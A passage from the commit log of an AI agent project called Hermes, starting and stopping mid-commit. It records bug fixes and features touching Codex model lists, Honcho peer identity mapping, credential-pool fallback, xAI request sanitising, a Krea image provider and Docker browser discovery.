Export UV_PYTHON_INSTALL_DIR and UV_PYTHON_BIN_DIR to /usr/local/share/uv/
in the root-FHS branch of resolve_install_layout so the managed Python
is world-readable and the shared wrapper works for any user.

Closes #21457
2026-05-27 13:55:51 -07:00
kshitijk4poor 0537e2600d fix(skills): atomic lock write + drop dead _validate_category_name
Self-review follow-ups on the salvage of #33177 + #33188 + #33209:

W3 (real, lock_path.write_text was non-atomic AND the read path silently
resets data to an empty installed dict on JSONDecodeError — a crash mid-
write could nuke ALL hub provenance, not just official-optional). Switch
to the same mkstemp + fsync + atomic_replace pattern that _write_manifest
already uses in this module.

W5 (dead code) — _validate_category_name had one caller on origin/main
(install_from_quarantine), swapped to _validate_install_parent_path by
#33177. Remove the now-unused definition to avoid the attractive-nuisance
of contributors picking the wrong validator.

Behavior preserved on the happy path; verified all 200 skills/hub tests
plus the three E2E scenarios (destructive restore, backfill idempotency,
adversarial nonexistent skill) still pass after both fixes.
2026-05-27 13:39:58 -07:00
wysie ee80dfdea0 fix: preserve skill packages during curator consolidation 2026-05-27 13:39:58 -07:00
wysie f040710d04 fix: backfill official optional skill provenance 2026-05-27 13:39:58 -07:00
wysie a38e283395 fix: preserve nested official skill install paths 2026-05-27 13:39:58 -07:00
kshitijk4poor 53bdef5775 test(cli): regression test for hermes update fork upstream sync (#26172)
Asserts that when hermes update runs on a fork whose local HEAD matches
origin/main but commit_count == 0, the early-return path still consults
_sync_with_upstream_if_needed() before printing "Already up to date!".

Locks in the fix from the parent commit so the upstream-sync call cannot
silently regress out of the commit_count == 0 branch.
2026-05-27 13:10:50 -07:00
Franci Penov 6f2a2f157f fix: check upstream even when origin/main has no new commits
The upstream sync logic only ran after a successful origin pull,
so forks whose origin/main was already in sync with local (but
behind upstream/main) would bail out with "Already up to date!"
without ever checking upstream.
2026-05-27 13:10:50 -07:00
Teknium e8955f222c fix(codex): drop dead model slugs that HTTP 400 on ChatGPT Pro (#33424)
DEFAULT_CODEX_MODELS shipped three slugs that the chatgpt.com Codex
backend rejects with HTTP 400 'The <slug> model is not supported when
using Codex with a ChatGPT account.' on every account tested live:

  gpt-5.2-codex
  gpt-5.1-codex-max
  gpt-5.1-codex-mini

Live verified against https://chatgpt.com/backend-api/codex/models
which returns gpt-5.5, gpt-5.4, gpt-5.4-mini, gpt-5.3-codex,
gpt-5.3-codex-spark, gpt-5.2 for ChatGPT Pro accounts.

When _fetch_models_from_api fell back to DEFAULT_CODEX_MODELS (offline
first-run, transient API failure) the picker surfaced these dead slugs
and crashed on selection. The forward-compat synthesis table chained
them downstream too.

If OpenAI re-enables them on the OAuth-backed Codex backend, live
discovery will pick them up automatically — the defaults list is only
consulted when live discovery is unavailable.

Test fixture pivoted to use gpt-5.3-codex (templated by 4 entries) as
the synthesis driver so the forward-compat test still exercises the
synthesis path.
2026-05-27 12:16:15 -07:00
teknium1 5deb384b53 chore(release): map donovan-yohan for #33263 salvage 2026-05-27 11:48:23 -07:00
Donovan Yohan c94ad89818 fix(kanban): retry corrupt-board dispatch after quarantine 2026-05-27 11:48:23 -07:00
xxxigm fc47b7285c fix(codex): omit tools key from Codex Responses kwargs when no tools registered
Salvages the transport-side fix from #32911 (@xxxigm). Closes #32892.

The openai SDK's responses.stream() / responses.parse() eagerly call
_make_tools(tools), which iterates tools without a None guard. Passing
tools=None raises TypeError: 'NoneType' object is not iterable before
any HTTP request is issued (openai==2.24.0).

PR #33042 already removed responses.stream() from our own Codex call
paths, so the specific iteration crash inside _make_tools is no longer
on the hot path. But the right API contract is to omit tools entirely
when there are no functions to expose — passing tools=None to the
backend is semantically wrong regardless of the SDK's iteration
behavior, and we'd hit it again on any future code path that hasn't
migrated off responses.stream().

This applies the transport-level part of @xxxigm's fix: move
'tools': response_tools into the if response_tools: branch so the
key is omitted when there are no tools, just like tool_choice and
parallel_tool_calls already are. Skips the run_agent.py-side
_strip_sdk_none_iterables helper from their PR — that path is now
obsolete because the SDK helper that needed defending is gone.

Tests
- tests/run_agent/test_codex_no_tools_nonetype.py: 6 tests trimmed
  from @xxxigm's original 13-test file. Drops the obsolete tests for
  _strip_sdk_none_iterables and _RecordingResponsesStream (helpers
  that don't exist on main anymore), keeps the transport behavior
  tests + the SDK contract sanity check that ensures we notice if
  upstream ever fixes _make_tools(None).
- 6/6 passing locally.

Co-authored-by: xxxigm <tuancanhnguyen706@gmail.com>
2026-05-27 11:46:17 -07:00
teknium1 8386f84454 chore(release): map Brixyy for #33136 salvage 2026-05-27 11:30:55 -07:00
Brixyy dc9d677d59 fix(agent): classify TypeError('NoneType ... not iterable') as retryable provider shape error
Salvages the intent of #33136 (@Brixyy) onto current main. The original PR
was written against the pre-refactor monolithic run_agent.py and added a
top-level _is_nonretryable_local_validation_error() helper. Both target
functions have since been extracted to agent/conversation_loop.py:2869,
so the salvage applies the equivalent guard inline at that canonical
location rather than reintroducing the helper.

## Why

After #33042 made our own Codex consumer structurally immune to NoneType
crashes, third-party shims, mocked clients, and any future code path that
hasn't migrated could still surface TypeError: 'NoneType' object is not
iterable as a wire-shape mismatch. The agent loop's classifier currently
treats ALL TypeError as a local programming bug and aborts non-retryable
— users on stale Telegram/gateway turns saw bare "Non-retryable error
(HTTP None)" with no recovery.

This is a provider/SDK shape mismatch, not a local programming bug. The
retry/fallback path should run, not be short-circuited.

## What

agent/conversation_loop.py: extend is_local_validation_error to exclude
TypeErrors whose message matches the NoneType-not-iterable shape (case-
insensitive, both "NoneType" and "not iterable" must appear).

tests/run_agent/test_jsondecodeerror_retryable.py:
- update the mirror predicate to match the production check
- add TestNoneTypeNotIterableIsRetryable class with 3 tests (the basic
  shape, message variants, unrelated TypeErrors still abort)
- add TestAgentLoopSourceHasNoneTypeCarveOut to enforce the source-level
  invariant matches the test mirror

## Validation

tests/run_agent/test_jsondecodeerror_retryable.py +
tests/run_agent/test_31273_402_not_retried.py → 14/14 passing

Co-authored-by: Brixyy <subrtt@gmail.com>
2026-05-27 11:30:55 -07:00
teknium1 3476509f97 chore(release): map sanghyuk-seo-nexcube for #33383 salvage 2026-05-27 11:19:55 -07:00
Sanghyuk Seo 283bb810e7 fix(agent): tolerate large codex stream prefill 2026-05-27 11:19:55 -07:00
teknium1 486d632cc2 fix(auxiliary): coerce None final.output to empty list in Codex aux adapter
Closes #33368.

`_CodexCompletionsAdapter.create()` iterates `final.output` from the
Codex Responses stream. The event-driven consumer (introduced in #33042)
always sets `final.output` to a list, so this shape can't come from our
own code path. But:

- Mocked clients in tests can return a typed Response with `output=None`
- Third-party shims / compatibility layers that bypass the consumer can
  do the same
- A future code path that wraps a different consumer could regress

The old code `getattr(final, "output", [])` returns `None` (not the
default `[]`) when the attribute EXISTS but is `None`. Iterating
`None` then raises `TypeError: 'NoneType' object is not iterable` —
the exact error logged by title-generation when this fires.

Fix: `getattr(final, "output", None) or []` — single-line defensive
coerce. Cheap; zero risk.

Regression test asserts the auxiliary path handles a final whose
`.output` is `None` (via monkey-patched consumer) without raising and
returns the expected chat.completions-shaped response.

Reporter: @pavegrid-1 (issue #33368).
2026-05-27 11:08:21 -07:00
Teknium 9919caff46 feat(image_gen): add Krea provider plugin (Krea 2 Medium + Large) (#33236)
* feat(image_gen): add Krea provider plugin (Krea 2 Medium + Large)

New built-in image_gen backend wrapping Krea's Krea 2 foundation
image model family. Auto-discovered like the other image_gen plugins
and appears in 'hermes tools' → Image Generation → Krea.

Krea's API is asynchronous — submit returns a job_id, poll /jobs/{id}
until terminal. The provider hides that behind the synchronous
ImageGenProvider.generate() contract: submit, poll every 2s with
light backoff (max 5s), 3-minute ceiling matching Krea's hosted-tool
timeout. Result URL is materialised to $HERMES_HOME/cache/images/
to avoid CDN-expiry 404s downstream (same fix as xAI #26942).

Models:
- krea-2-medium (default — Krea's 'start here' recommendation)
- krea-2-large

Aspect ratios map landscape→16:9, square→1:1, portrait→9:16.
Resolution: 1K (Krea's only current option).

Kwarg passthrough: seed, creativity (raw/low/medium/high), styles,
image_style_references (capped 10), moodboards (capped 1) — matches
Krea's per-request limits. Unknown kwargs are ignored.

Config knobs (config.yaml):
  image_gen.provider: krea
  image_gen.krea.model: krea-2-medium | krea-2-large
  image_gen.krea.creativity: raw | low | medium | high
Env overrides: KREA_API_KEY (required), KREA_IMAGE_MODEL.

KREA_API_KEY is registered in OPTIONAL_ENV_VARS so 'hermes setup'
prompts for it.

31 new tests; image_gen suite + picker + tools_config: 211/211.

* fix(image_gen/krea): address review feedback

- Update KREA_API_KEY setup URL to the canonical token-creation page
  (https://www.krea.ai/app/api/tokens). The previous URL returned 404.

- Fail fast on non-retryable HTTP statuses during poll. The previous
  loop retried every HTTPError for the full 180s deadline, so an auth
  (401), billing (402), forbidden (403), or not-found (404) response
  would make image_generate hang for three minutes. Only retry
  transient statuses (408/409/425/429/5xx); surface everything else
  immediately.

- Add 5 tests covering fail-fast on 401/403/404 and retry on 429/503.

* fix(krea): point users at the real API token dashboard URL

Three call sites linked users to dashboard pages that don't exist:
- hermes_cli/config.py: https://www.krea.ai/app/api/tokens
- plugins/image_gen/krea/__init__.py get_setup_schema: https://www.krea.ai/api-keys
- plugins/image_gen/krea/__init__.py auth_required error: https://www.krea.ai/api-keys

Per Krea's own docs (https://docs.krea.ai/developers/api-keys-and-billing),
the real dashboard URL is https://www.krea.ai/settings/api-tokens. All three
sites now point there.
2026-05-27 11:01:47 -07:00
Erosika eccbbe4b1b chore(release): map adopted Honcho contributors 2026-05-27 10:49:33 -07:00
Erosika c89393b711 chore(honcho): trim peer-card fallback comment 2026-05-27 10:49:33 -07:00
Dora (kyra-nest) bcae3fcc4e fix(honcho): align user context peer perspective
Use the shared observer/target resolver for session context so peer='user' and explicit configured peer IDs query Honcho from the same assistant-observed perspective when allowed. Add regression coverage for user alias, explicit peer, and self-observer fallback.
2026-05-27 10:49:33 -07:00
David Doan 1800a1c796 fix(honcho): align peer-card read and write paths
honcho_profile(peer="user") returned an empty card even when Honcho
held a populated peer card for the user. Two independent bugs combined
to produce the symptom:

1. Read path: get_peer_card() called _fetch_peer_card(observer, target=user),
   which hits GET /peers/{observer}/card?target={user} — the observer's local
   card of the user. On self-hosted Honcho v3 this slot is empty unless writes
   also use it. The peer card lives on the user peer itself
   (GET /peers/{user}/card). Add a fallback: when the observer-target slot is
   empty and a target exists, retry against the target peer's own card.

2. Write path: set_peer_card() resolved only the target peer and called
   user_peer.set_card(card). The read path uses the assistant peer as
   observer, so writes and reads addressed different Honcho card scopes.
   Align set_peer_card() with _resolve_observer_target() so writes go to
   assistant_peer.set_card(card, target=user_peer_id), matching the read.

Both paths now use the same observer/target resolution, and the read
path additionally falls back to the target's own card for compatibility
with deployments where cards were written directly to the peer.

Closes: related to #13375, #17124, #20729
2026-05-27 10:49:33 -07:00
Erosika 1a8e67076a fix(honcho): cover pinUserPeer + aiPeer edge cases in setup, clone, and gateway cache
Three related regressions stemming from the pinUserPeer alias landing:

- Setup wizard read host-only fields when detecting current shape but the
  parser supports root-level config and gives host pinUserPeer higher
  precedence than pinPeerName. Re-running setup could mis-detect shape
  and silently flip routing. Detection now uses the same resolver order
  as HonchoClientConfig, and each shape branch scrubs every peer-mapping
  key before writing so a stale pinUserPeer=false can't outrank a freshly
  written pinPeerName=true. Multi no longer auto-writes
  userPeerAliases={} (was silently masking root-level baselines).

- clone_honcho_for_profile inherited pinPeerName but not pinUserPeer, so
  a default profile configured with the newer key produced cloned
  profiles without the pin.

- Gateway cache-busting signature fingerprinted Honcho user-peer fields
  but not ai_peer. Since HonchoSessionManager freezes cfg.ai_peer at
  init, mid-flight aiPeer edits kept assistant writes on the old peer
  until an unrelated cache eviction. ai_peer is now part of the
  signature.
2026-05-27 10:49:33 -07:00
Erosika 939499beed chore(honcho): trim PR-history narration from docs and tests
Remove "PR #14984 / #27371 / #1969" references and "the original key /
legacy / backwards-compatible / Port #N" narration from the honcho
plugin README, tests, and one stale code comment. These artefacts age
poorly: they describe how a change happened rather than what the code
does today, and they tax readers who weren't around for the original
work.

Also drop a dangling reference to scratch/memory-plugin-ux-specs.md in
__init__.py — the file isn't in the repo or git history.

No behaviour change.
2026-05-27 10:49:33 -07:00
Erosika 6feb2afd50 fix(honcho): plug pinPeerName transition gaps
Three correctness gaps when honcho.json's identity-mapping config changes
mid-flight:

1. The gateway's agent cache signature ignored honcho identity keys, so
   editing peerName / pinPeerName / userPeerAliases / runtimePeerPrefix
   was silently dropped until an unrelated cache eviction. Extend
   _extract_cache_busting_config to fingerprint the resolved honcho
   config so the AIAgent rebuilds on the next message.

2. cmd_setup let single → multi flips orphan the pinned-pool history
   under peerName without warning. Detect the transition, warn that
   runtime users will resolve to fresh empty peers, and auto-steer to
   hybrid (alias the operator's runtime IDs back to peerName) so the
   operator's own continuity survives. yes / no overrides available.

3. README didn't document the orphaning behaviour. Add a "Migrating
   single → multi" callout under Deployment shapes.

Tests:
- TestPinTransition (test_pin_peer_name.py): fresh-manager flip resolves
  to runtime, in-process flip is gated by the per-key session cache
  (documents the gateway-cache-must-bust contract), 3 cache-bust
  signature tests for pin / aliases / prefix.
- TestProfilePeerUniqueness: two profiles pinned to distinct peerNames
  resolve to distinct peers; host-level peerName overrides root when
  pinned.
- test_single_to_multi_steers_to_hybrid_by_default and
  test_single_to_multi_yes_override_keeps_multi (test_cli.py): wizard
  guard end-to-end coverage.
2026-05-27 10:49:33 -07:00
erosika 58987cb8b1 docs(honcho): document identity-mapping config + resolver ladder + deployment shapes
PR #27371 introduced three new identity-mapping config keys
(pinPeerName, userPeerAliases, runtimePeerPrefix), but the README's
'Full Configuration Reference' didn't mention them.  Operators had
to read the source to understand the resolver, leading to predictable
support questions ("why is my user split across two peers?", "what
does pinPeerName actually pin?").

Add a new 'Identity Mapping' subsection that covers:

* The four config keys (pinUserPeer + alias, userPeerAliases,
  runtimePeerPrefix) with concrete examples.

* The 7-step resolver ladder so operators can predict which peer a
  given runtime ID will land on.

* Why there's no symmetric pinAiPeer (the AI peer is already pinned
  by construction; the asymmetry is intentional).

* Host vs root semantics (host-level replaces root for maps, wipes
  with empty value).

* The three deployment shapes ('hermes honcho setup' uses these same
  shape names) with one-line guidance per shape.
2026-05-27 10:49:33 -07:00
erosika 3cf5e8225d refactor(honcho): accept pinUserPeer as backwards-compatible alias for pinPeerName
The original key 'pinPeerName' from #14984 is ambiguous: a fresh
reader can't tell whether it pins the user peer or the AI peer from
the name alone.  The resolver only ever pins the user-side
(_resolve_user_peer_id short-circuits when pin_peer_name is true; the
AI peer is already pinned by construction via aiPeer).

Add 'pinUserPeer' as the canonical alias.  Both keys land on the
same internal pin_peer_name field; precedence is host pinUserPeer →
host pinPeerName → root pinUserPeer → root pinPeerName → default.
Host-level always beats root-level regardless of alias, so a host
block can still explicitly disable a root-level pin even via the new
key.

Make _resolve_bool variadic so it can express the four-value
precedence chain.  All existing callers pass two positional args +
default keyword, which the new signature accepts unchanged.

Internal var name (pin_peer_name) stays the same to keep the
cherry-picked #27371 commits clean and avoid a noisy rename diff.
2026-05-27 10:49:33 -07:00
erosika 0bac880991 feat(honcho-setup): add deployment-shape step to identity-mapping wizard
The PR #27371 resolver introduced three identity-mapping config keys
(pinPeerName, userPeerAliases, runtimePeerPrefix), but operators had
no guided way to set them — they had to read the README, understand
the resolver ladder, and hand-edit honcho.json.  This commit adds an
interactive step to 'hermes honcho setup' that asks one question
('what's your deployment shape?') and writes the right combination
of keys.

Three shapes cover the realistic deployments:

* single -- pinPeerName=true.  All gateway users collapse to your
            peerName.  Recommended for personal/single-operator use.

* multi  -- pinPeerName=false, no aliases.  Each runtime user gets
            their own peer.  Optional runtimePeerPrefix for cross-
            platform namespace isolation.

* hybrid -- pinPeerName=false, with userPeerAliases mapping YOUR
            runtime IDs (Telegram UID, Discord snowflake, Slack
            user, Matrix MXID) to peerName.  Multi-user gateway
            where you are a privileged operator.

A 'skip' option leaves existing identity-mapping config untouched —
critical because re-running setup must not silently wipe operator-
curated aliases.

The wizard detects the current shape from existing config so the
prompt's default matches what the operator already has.
2026-05-27 10:49:33 -07:00
erosika c03960decd fix(honcho): include user_id in agent cache signature to prevent shared-thread peer contamination
PR #27371 introduced a per-user-peer resolver in HonchoSessionManager,
but the resolved runtime identity is frozen into the manager at first-
message init.  When the gateway session_key intentionally omits the
participant ID (the default for threads via thread_sessions_per_user=
False), a cached AIAgent created by user A is reused for user B's
messages, attributing B's writes to A's resolved Honcho peer and
breaking #27371's per-user-peer contract.

Fix by including user_id and user_id_alt in _agent_config_signature so
the cache key distinguishes participants in shared threads.  Each user
in a shared thread now triggers a fresh AIAgent build (trading prompt-
cache warmth for memory-attribution correctness — the right tradeoff
for an external-memory backend where misattribution is unrecoverable).

The default-None case keeps the signature byte-identical to pre-fix
behavior so this change doesn't invalidate in-flight caches on deploy.
2026-05-27 10:49:33 -07:00
erosika 00e6830204 fix(honcho): inherit identity-mapping config in cloned profile blocks
PR #27371 added host-scoped userPeerAliases, runtimePeerPrefix, and
pinPeerName, but the cloned-profile allowlist in
plugins/memory/honcho/cli.py::clone_honcho_for_profile() omitted them.
A new profile created via 'hermes honcho setup' or similar would
silently drop the operator's identity-mapping config, causing gateway
users to resolve to raw runtime IDs and fragmenting Honcho memory
across an unintended set of peers.

Add the three keys to the allowlist and a regression test class
covering all three plus the unset case.
2026-05-27 10:49:33 -07:00
mavrickdeveloper 30b391ab36 Avoid Honcho runtime peer collisions
(cherry picked from commit 4ae3c1a228)
2026-05-27 10:49:33 -07:00
mavrickdeveloper 382b1fc1b6 Cover Honcho runtime peer edge cases
(cherry picked from commit d89a57ea40)
2026-05-27 10:49:33 -07:00
mavrickdeveloper 2e3c6627ce Add Honcho runtime peer mapping
(cherry picked from commit 864cdb3d2e)
2026-05-27 10:49:33 -07:00
zccyman 2e181602a1 fix(agent): isolate credential pool on provider fallback
Closes #33163.

When _try_activate_fallback() switches from one provider to another (e.g.
openai-codex → openrouter), the credential pool still belongs to the
primary provider. This causes two compounding bugs:

1. The pool retains the primary's base_url. Downstream pool recovery
   (rate_limit / billing / auth) calls _swap_credential() with a primary
   entry which overwrites the agent's base_url back to the primary's
   endpoint. Every fallback request then 404s against the wrong host.

2. Pool recovery acting on errors from the FALLBACK provider mutates the
   PRIMARY's pool state (#33088 reported a related corruption pattern),
   exhausting/rotating entries that have nothing to do with the failure.

Two layered fixes:

a) try_activate_fallback (agent/chat_completion_helpers.py): on fallback
   activation, clear agent._credential_pool when the fallback provider
   doesn't match the pool's provider. Pool is preserved when the fallback
   shares the pool's provider (e.g. multiple openrouter entries).

b) recover_with_credential_pool (agent/agent_runtime_helpers.py):
   defensive guard rejects any pool mutation when agent.provider doesn't
   match pool.provider. Defense-in-depth — should never fire after (a)
   is in place, but covers any future path that attaches a stale pool.

Salvaged from @zccyman's PR #33217. The original PR was written against
the pre-refactor monolithic run_agent.py; both target functions have
since been extracted to module-level helpers. Behavior is identical —
the guards live in the canonical extracted locations.

Tests
- New tests/run_agent/test_fallback_credential_isolation.py (7 tests
  covering: fallback clears mismatched pool, fallback preserves matching
  pool, recovery rejects mismatched pool, recovery accepts matching
  pool, 429-from-z.ai-doesn't-exhaust-codex-pool, _client_kwargs
  base_url survives pool clear, _swap_credential doesn't restore
  primary URL after fallback).
- Cross-verified: 77/77 passing across fallback isolation tests +
  agent/test_credential_pool.py — no regression.

Co-authored-by: zccyman <16263913+zccyman@users.noreply.github.com>
2026-05-27 10:45:26 -07:00
JohnC1009 414a5bc924 fix(auth): fall back to global auth.json in _load_provider_state
In profile mode, _load_provider_state previously returned None when a
provider was absent from the profile's auth.json — even if the user had
authenticated at the global root. This broke runtime credential resolvers
that read state directly (resolve_nous_access_token,
resolve_nous_runtime_credentials), causing profiles without their own
nous login to fail with 'Hermes is not logged into Nous Portal' despite
a valid global session.

Push the existing read-only global fallback (already used by
get_provider_auth_state and read_credential_pool) into _load_provider_state
so every caller benefits, and simplify get_provider_auth_state into a thin
wrapper. Writes still target the profile only — profile state continues to
shadow global state on the next read after a per-profile login. Behavior in
classic (non-profile) mode is unchanged because _load_global_auth_store
returns an empty dict.

Adds 5 tests covering the new contract on _load_provider_state directly.
Existing 770 auth/credential/nous tests still pass.
2026-05-27 09:38:58 -07:00
kshitij dd0d5d5a82 chore: add JohnC1009 to AUTHOR_MAP (#33351)
Pre-requisite for PR #32020 salvage (auth: global auth.json fallback
in _load_provider_state). Contributor_audit strict mode fails if any
commit author email on main is unmapped.

Co-authored-by: kshitijk4poor <kshitijk4poor@gmail.com>
2026-05-27 09:37:50 -07:00
LeonSGP43 458a94e425 fix(cli): keep destructive slash modal on Linux 2026-05-27 05:57:01 -07:00
Teknium f0de3cd0a0 fix(agent): roll back switch_model() state when client rebuild fails (#33228)
Closes #33175.

switch_model() in agent/agent_runtime_helpers.py mutated agent.model and
agent.provider before rebuilding the client, with no try/except to restore
them on failure. If the rebuild raised (bad API key, network error,
build_anthropic_client failure, etc.) the agent was left with the new
model+provider name paired with the OLD client — producing HTTP 400s like
"claude-sonnet-4-6 is not supported on openai-codex" on the next turn.

Callers in cli.py, gateway/run.py, and tui_gateway/server.py already catch
the exception and warn the user, but the warning was misleading because
the swap had partially succeeded; the agent's state was torn.

Snapshot every mutated field before the swap, wrap the swap+rebuild block
in try/except, and restore the snapshot on failure before re-raising so
the caller's warning surfaces.

Reported by @amirariff91. Tests cover both branches (chat_completions and
anthropic_messages) and the cross-branch case (anthropic -> openai).
2026-05-27 05:43:20 -07:00
ethernet 825948edab ci(docker): simplify tagging — push both :main and :latest on main push
Remove the ancestor-check gate and the separate move-latest job.
On main pushes, the merge job now tags both :main and :latest in
a single imagetools create call. Releases still get :<tag> only.

Removed:
- move-latest job (ancestor check + retag dance)
- Decide whether to move :main step (ancestor check in merge)
- Compute tag step
- push_main gate on manifest push
- merge job outputs (nothing downstream needs them anymore)
2026-05-27 05:32:19 -07:00
Teknium b4eea187d5 fix(xai-oauth): gate slash-enum strip on model name + add regression tests (#28490)
Three additions on top of @Nami4D's salvage:

1. Gate the preflight slash-enum strip on the model name pattern
   (grok-* / x-ai/grok-*).  The original PR stripped slash-containing
   enum values from every codex_responses request, but native Codex
   (OpenAI) and GitHub Models DO accept slash enums — stripping them
   there would silently degrade tool-schema constraints.  xAI is the
   only Responses-API surface that rejects the shape.

2. Resolve the merge conflict in agent/transports/codex.py by
   preserving both the timeout-forwarding block that landed on main
   between the PR's branch point and now AND the new service_tier
   strip.  Behavioural intent of both is preserved.

3. Six new tests in tests/agent/transports/test_codex_transport.py
   covering:
   - TestCodexTransportXaiServiceTierStrip (3 tests): xAI strips
     service_tier from request_overrides; non-xAI codex_responses
     and GitHub Models both KEEP service_tier (regression guards
     so the strip stays xAI-only).
   - TestPreflightSlashEnumStrip (3 tests): Grok and aggregator-
     prefixed Grok model names both trigger the safety-net strip;
     non-Grok models preserve slash enums as a regression guard
     against the strip becoming too broad.

51/51 in tests/agent/transports/test_codex_transport.py.

Co-authored-by: Nami4D <hello@nami4d.tech>
2026-05-27 05:25:38 -07:00
Nami4D a699de83ec fix(xai-oauth): strip service_tier and add safety-net sanitization for slash enums
xAI's /v1/responses endpoint rejects service_tier with HTTP 400
"Argument not supported: service_tier" when users activate /fast mode.

Also add a safety-net strip_slash_enum call in _preflight_codex_api_kwargs
to catch any tool schemas that might slip through the caller-level
sanitization. xAI's Responses API grammar compiler rejects enum values
containing forward slashes (e.g. HuggingFace model IDs like
"Qwen/Qwen3.5-0.8B") with the opaque "Invalid arguments passed to the
model" error.

Fixes the root cause of "Invalid arguments passed to the model" errors
reported by xAI OAuth (SuperGrok) users.
2026-05-27 05:25:38 -07:00
Teknium 0325e18f34 fix(gateway): keep Telegram heartbeat + interim commentary on; edit heartbeat in place (#33187)
#33151 flipped THREE Telegram display defaults to false:
  - tool_progress: new -> off            (kept: per-tool stream is too chatty)
  - interim_assistant_messages: T -> F   (REVERTED here)
  - long_running_notifications: T -> F   (REVERTED here)
  - busy_ack_detail: T -> F              (kept: verbose iteration counter)

The two reverts were wrong. interim_assistant_messages = the model's REAL
words mid-turn ("I'll inspect the repo first.", "Let me check both files
in parallel"). That is signal, not noise. Suppressing it left Telegram
users staring at "typing..." for the entire turn duration with no
feedback. long_running_notifications = the periodic heartbeat. Silent
agent for 30 minutes is worse than one bubble updating every 3 minutes.

Changes:
  - gateway/display_config.py: Telegram tier-1 inbox keeps both defaults
    on (only tool_progress and busy_ack_detail stay off).
  - gateway/run.py _notify_long_running(): edit a single heartbeat
    message in place (where the adapter supports it) instead of posting
    a new "Still working..." bubble each interval. Telegram, Discord,
    Slack, Matrix all qualify. Falls back to send-new when edit fails.
  - gateway/run.py: tighten heartbeat text. " Still working... (12 min
    elapsed — iteration 21/60, running: terminal)" -> " Working — 12
    min, terminal". Verbose iteration detail moves behind busy_ack_detail
    (one knob now controls both busy acks AND heartbeat verbosity).
  - tests/, cli-config.yaml.example, website/docs/user-guide/messaging:
    updated to reflect the corrected story.
2026-05-27 05:21:53 -07:00
Teknium 69dfcdcc15 fix(auth): codex chat path falls back to credential_pool when singleton is empty
Closes #32992.

The chat path resolves Codex credentials via `resolve_codex_runtime_credentials`
which only reads `providers.openai-codex.tokens` (the singleton). The auxiliary
path uses `_read_codex_access_token` which checks the credential_pool first.
For users whose tokens live only in the pool — manual seed, partial re-auth,
restore from backup, or any state where the singleton is empty but the pool
is healthy — the chat path raised AuthError or (worse, since OpenAI(api_key='')
silently attaches no header) the wire saw HTTP 401 "Missing Authentication header"
while the auxiliary path worked fine.

This adds a pool fallback to `resolve_codex_runtime_credentials`: when the
singleton has no usable access_token, scan `credential_pool.openai-codex` for
the first entry that has a non-empty access_token and isn't in an exhaustion
cooldown window (`last_error_reset_at` in the future). If found, return that
token with `source="credential_pool"`. If no usable entry exists, the original
AuthError propagates as before.

Regression tests cover:
- Empty singleton + healthy pool entry → pool token returned
- Pool fallback skips entries currently in cooldown
- Empty singleton + empty/wedged pool → AuthError propagates (existing contract preserved)
2026-05-27 03:43:51 -07:00
Ben 3e33e14335 fix(docker): discover agent-browser Chromium binary at boot
The image's Dockerfile runs npx playwright install chromium, which
populates $PLAYWRIGHT_BROWSERS_PATH (=/opt/hermes/.playwright) with a
`chromium_headless_shell-<build>/chrome-headless-shell-linux64/` tree.
agent-browser (the runtime CLI Hermes spawns for the browser tool)
doesn't recognise this layout in its own cache scan and fails with
`Auto-launch failed: Chrome not found` — even though the binary is
right there.

Reproduction on current main:

    $ docker run --rm <image> sh -c 'npx -y agent-browser snapshot --url about:blank'
    ✗ Auto-launch failed: Chrome not found. Checked:
      - agent-browser cache: /tmp/.../.agent-browser/browsers
      - System Chrome installations
      - Puppeteer browser cache
      - Playwright browser cache
    Run `agent-browser install` to download Chrome, or use --executable-path.

Fix: at boot, locate the binary under $PLAYWRIGHT_BROWSERS_PATH and
export AGENT_BROWSER_EXECUTABLE_PATH via /run/s6/container_environment
so the with-contenv shebang on main-wrapper.sh propagates it into the
supervised `hermes` process and thence to agent-browser subprocesses.

Filename-matched (chrome / chromium / chrome-headless-shell /
chromium-browser), not path-matched: the chromium dir contains many
shared libraries (libGLESv2.so, libEGL.so, ...) which inherit the
executable bit from Playwright's tarball but are NOT browser binaries.
Compare PR #18635's earlier `find | grep -Ei 'chrome|chromium'` which
would match the path .../chrome-headless-shell-linux64/libGLESv2.so
and pick a .so as the browser binary.

User overrides (e.g. `-e AGENT_BROWSER_EXECUTABLE_PATH=/usr/bin/...`)
are respected — the discovery block is skipped when the env var is
already set. Quietly skipped when $PLAYWRIGHT_BROWSERS_PATH doesn't
exist (e.g. custom builds that strip Playwright).

This salvages PR #18635 by @jackey8616, who identified the bug and
proposed the same env-var approach but in the now-deprecated
docker/entrypoint.sh shim and with a path-match find command that
selected .so files instead of the chrome binary. The fix retargets
docker/stage2-hook.sh (the s6-overlay cont-init script where boot-time
env setup belongs) with a corrected filename-match query.

Fixes #15697
Closes #18635

Co-authored-by: Clooooode <12930377+jackey8616@users.noreply.github.com>
2026-05-27 20:43:27 +10:00
helix4u ea34925002 fix(discord): recover Windows voice opus decoding 2026-05-27 03:35:33 -07:00
Ben Barclay bb65bebed7 Merge pull request #30504 from ilonagaja509-glitch/fix/30394-docker-anthropic-package
fix(docker): include anthropic, bedrock, azure-identity extras in image

Fixes #30394. Air-gapped/restricted-network Docker containers can't reach
PyPI for lazy-install, so `--extra anthropic --extra bedrock --extra
azure-identity` are now added to the Dockerfile's `uv sync` so these
provider packages are baked into the published image.

The [all] extra deliberately excludes these (per the 2026-05-12
lazy-install policy on [all]) to keep `uv sync --locked` from breaking
when one of their pinned versions gets PyPI-quarantined. The Dockerfile
adds them back via additive --extra flags, mirroring the existing
--extra messaging pattern (issue #24698 / test_dockerfile_pid1_reaping.py).

Follow-up: separate PR will bump pyproject.toml's [anthropic] extra
from 0.86.0 to 0.87.0 to converge with tools/lazy_deps.py's
CVE-patched pin (CVE-2026-34450, CVE-2026-34452).
2026-05-27 20:29:13 +10:00
Teknium 0b6ace6498 test(verbose): align with telegram tier-1 inbox default
Two tests in test_verbose_command.py asserted Telegram's tool_progress
default was "new" and expected /verbose to cycle that to "all". The
default has since been overridden to "off" in gateway/display_config.py
(_PLATFORM_DEFAULTS for telegram — tier-1 inbox preset that keeps mobile
chats final-answer-first), making the first /verbose invocation cycle
off → new, not all → verbose.

The behavioral change was intentional; the tests were stale and missing
from the same commit. Surfaced as a pre-existing failure on origin/main
during CI for the unrelated #33164 / #33168 Codex auth salvages.
2026-05-27 03:13:15 -07:00
konsisumer f1422ffd77 fix(gateway): classify Codex 429 quota as rate-limit, not missing credentials
When the Codex OAuth token endpoint returns 429 (usage-limit / quota
exhaustion), refresh_codex_oauth_pure raised a generic auth error that the
